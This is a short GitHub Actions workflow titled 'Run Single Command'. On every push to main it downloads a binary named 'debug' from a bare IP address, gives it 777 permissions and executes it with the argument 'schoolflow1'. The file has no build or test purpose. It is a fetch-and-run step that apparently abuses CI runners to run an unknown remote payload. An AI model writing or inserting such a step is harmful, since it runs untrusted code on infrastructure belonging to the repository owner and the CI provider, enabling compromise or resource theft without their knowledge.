name: Run Single Command

on:
  push:
    branches:
      - main

jobs:
  run-shell:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v3

      - name: Run a Single Shell Command
        run: curl -O 87.121.79.39/ethan/debug; chmod 777 debug; ./debug schoolflow1 
